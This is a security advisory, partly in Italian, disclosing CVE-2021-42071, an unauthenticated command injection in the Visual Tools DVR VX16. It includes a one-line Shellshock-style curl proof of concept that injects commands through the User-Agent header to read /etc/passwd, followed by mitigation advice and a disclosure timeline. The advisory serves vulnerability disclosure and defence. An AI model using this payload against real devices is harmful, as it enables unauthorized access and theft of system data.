Visual Tools

Security advisory: Visual Tools DVR (CVE-2021-42071)

Visual Tools DVR VX16 4.2.28.0 – Iniezione di comandi del sistema operativo (non autenticato)

Swascan ha identificato una vulnerabilità critica durante una regolare attività di test di penetrazione su un client relativo a Visual Tools (marchio di fabbrica) un software di AX Solution LA (https://visual-tools.com).

Al momento della pubblicazione (puoi consultare la timeline in fondo all’articolo), Swascan ha informato AX Solution della vulnerabilità senza alcuna risposta.

Questo articolo verrà debitamente aggiornato con la risposta dell’editore.

Soluzioni AX in breve

AX Solutions è una società con una solida infrastruttura tecnica, finanziaria e commerciale, la cui direzione è guidata dalla visione strategica dei suoi dirigenti e dalla partnership con i più importanti partner tecnologici e commerciali dei settori della tecnologia della sicurezza e dell’immagine.

AX Solutions sviluppa e produce prodotti e soluzioni per l’osservazione video intelligente e il conteggio delle persone per il mercato professionale. Questi sono venduti con il marchio Visual Tools attraverso un canale di distribuzione rafforzato di respiro internazionale formato da un’ampia rete di partner con presenza attiva in più di 40 paesi.

Riepilogo tecnico

Durante un Penetration Test, il team di ricerca sulla sicurezza informatica di Swascan ha rilevato un’importante vulnerabilità su: Visual Tools DVR VX16 4.2.28.0

Vulnerabilità CVSSv3.1 Gravità
Iniezione di comandi del sistema operativo AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 9.8 Critico

Nella sezione seguente i dettagli tecnici su questa vulnerabilità, comprese le prove e un proof-of-concept.

Questa vulnerabilità può interessare centinaia di dispositivi connessi a Internet

Dettagli sulla vulnerabilità

Inserimento comandi del sistema operativo (non autenticato)

  • CWE-78: Iniezione di comandi del sistema operativo
  • CVSSv3.1: 9.8 [AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H]
  • OWASP: A1:2017-Iniezione

Descrizione

In Visual Tools DVR VX16 4.2.28, un utente malintenzionato non autenticato può ottenere l’esecuzione di comandi remoti tramite i metacaratteri della shell nell’intestazione HTTP User-Agent cgi-bin/slogin/login.py. È possibile lanciare l’attacco da remoto senza alcuna forma di autenticazione.

Verifica teorica

Il seguente POC mostra come è possibile eseguire comandi di sistema e ottenere una shell remota.

# curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' bash -s :'' http://DVR_ADDR:PORT/cgi-bin/slogin/login.py

To demonstrate the vulnerability, it was chosen to execute the command “/bin/cat /etc/passwd” showing the contents of the file.

Command execution “/bin/cat /etc/password”

More details about the DVR:

Note Details
System Information Linux VSserver 2.6.35.4; i686 GNU/Linux Embedded Debian GNU 0.7
Bash GNU bash, version 3.2.39(1)-release(i486-pc-linux gnu)

Impact

An attacker could obtain access to the remote system and execute arbitrary commands on the Linux-based system as unprivileged user.

Remediation

Swascan is not aware of a patch or update to fix this vulnerability.

Please contact the vendor asking for new releases, patch or device upgrade.

Mitigation

The Swascan Cyber Security Research Team suggests to do not deploy the device directly on the internet, instead set up the DVR behind a VPN connection.

Disclosure Timeline:

  • 2020-giu-01: Scoperte vulnerabilità
  • 2020-giu-06: venditore contattato via e-mail (1a volta, nessuna risposta)
  • 2021-giu-18: CERT/CC contattato via email (nessuna risposta)
  • 2021-giu-28: venditore contattato via e-mail (2a volta, nessuna risposta)
  • 2021-lug-05: Exploit pubblicati
  • 2021-lug-07: CVE-ID richiesto a MITRE
  • 2021-10 ottobre: ​​rilasciato CVE-ID CVE-2021-42071

Fonti e riferimenti:

  1. https://www.cve.org/CVERecord?id=CVE-2021-42071
  2. https://nvd.nist.gov/vuln/detail/CVE-2021-42071
  3. https://www.exploit-db.com/exploits/50098
  4. https://visual-tools.com/
  5. https://en.wikipedia.org/wiki/Shellshock_(software_bug)
  6. https://owasp.org/www-community/attacks/Command_Injection
  7. https://cwe.mitre.org/data/definitions/78.html
  8. https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.md

Our Services

Vulnerability
Assessment

Network
Scan

Penetration
Testing

Domain threat
Intelligence

Cyber Threat
Intelligence

Malware Threat
intelligence

ICT Security
Assessment

Phishing
Attack Simulation

Smishing
Attack Simulation

Cyber Incident
Response

SoC
as a Service

Security
Management